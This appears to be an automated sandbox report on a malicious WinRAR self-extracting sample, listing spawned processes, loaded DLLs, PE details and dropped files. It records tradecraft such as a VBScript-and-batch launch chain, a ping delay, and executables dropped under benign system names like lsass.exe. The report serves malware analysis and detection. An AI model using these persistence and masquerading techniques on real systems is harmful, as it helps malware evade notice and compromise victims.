Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\webCrt\Surrogatedll.exe "C:\webCrt/Surrogatedll.exe"
Source: C:\webCrt\Surrogatedll.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\EeMFgDHDyZvTl.exe "C:\Recovery\EeMFgDHDyZvTl.exe"
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\webCrt\Surrogatedll.exe "C:\webCrt/Surrogatedll.exe"	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\EeMFgDHDyZvTl.exe "C:\Recovery\EeMFgDHDyZvTl.exe"	Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Section loaded: midimap.dll	Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Recovery\EeMFgDHDyZvTl.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kqq1aAcVUQ.exe

Static file information: File size 1769994 > 1048576

Source: kqq1aAcVUQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kqq1aAcVUQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kqq1aAcVUQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kqq1aAcVUQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kqq1aAcVUQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kqq1aAcVUQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: kqq1aAcVUQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: kqq1aAcVUQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kqq1aAcVUQ.exe

Source: kqq1aAcVUQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kqq1aAcVUQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kqq1aAcVUQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kqq1aAcVUQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kqq1aAcVUQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

File created: C:\webCrt\__tmp_rar_sfx_access_check_4207734

Jump to behavior

Source: kqq1aAcVUQ.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023F640 push ecx; ret	0_2_0023F653
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023EB78 push eax; ret	0_2_0023EB96
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD345300BD pushad ; iretd	5_2_00007FFD345300C1
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD345301CD pushad ; retf	5_2_00007FFD34530286
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD345347C9 push ss; iretd	5_2_00007FFD345347CF
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD34693F61 pushad ; retf	5_2_00007FFD34693F85
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD34925A03 push ds; retf	5_2_00007FFD34925A0F
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD3492629F push edi; ret	5_2_00007FFD34926316
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD345547C9 push ss; iretd	11_2_00007FFD345547CF
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD346B3F61 pushad ; retf	11_2_00007FFD346B3F85
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD3494CEE8 pushad ; retf	11_2_00007FFD3494CEE9
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34947E9B pushfd ; ret	11_2_00007FFD34947E9C
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34947FBA push edx; ret	11_2_00007FFD34947FBB
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34945A03 push ds; retf	11_2_00007FFD34945A0F
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD3494629F push edi; ret	11_2_00007FFD34946316
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD3494A40E pushfd ; ret	11_2_00007FFD3494A40F
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD3494CB83 push ebx; ret	11_2_00007FFD3494CB84
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34947BBC push FFFFFFBAh; ret	11_2_00007FFD34947C04

Source: Surrogatedll.exe.0.dr	Static PE information: section name: .text entropy: 7.5414886531282095
Source: EeMFgDHDyZvTl.exe.5.dr	Static PE information: section name: .text entropy: 7.5414886531282095
Source: lsass.exe.5.dr	Static PE information: section name: .text entropy: 7.5414886531282095
Source: EeMFgDHDyZvTl.exe0.5.dr	Static PE information: section name: .text entropy: 7.5414886531282095
Source: EeMFgDHDyZvTl.exe1.5.dr	Static PE information: section name: .text entropy: 7.5414886531282095
Source: EeMFgDHDyZvTl.exe2.5.dr	Static PE information: section name: .text entropy: 7.5414886531282095

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\webCrt\Surrogatedll.exe

File created: C:\Windows\Globalization\Time Zone\lsass.exe

Jump to dropped file

Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\nukLNhSq.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\webCrt\EeMFgDHDyZvTl.exe	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\Public\Pictures\EeMFgDHDyZvTl.exe	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\RyxhNllI.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\rrFUvAHK.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\hACmhobX.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Cursors\EeMFgDHDyZvTl.exe	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\KCOiojdz.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\IPdRdIgb.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\eMRvdFMJ.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Globalization\Time Zone\lsass.exe	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Recovery\EeMFgDHDyZvTl.exe	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\DWhAaqcM.log	Jump to dropped file
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	File created: C:\webCrt\Surrogatedll.exe	Jump to dropped file

Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Cursors\EeMFgDHDyZvTl.exe			Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Globalization\Time Zone\lsass.exe			Jump to dropped file

Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\KCOiojdz.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\nukLNhSq.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\eMRvdFMJ.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Users\user\Desktop\DWhAaqcM.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\rrFUvAHK.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\hACmhobX.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\RyxhNllI.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File created: C:\Users\user\Desktop\IPdRdIgb.log	Jump to dropped file

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
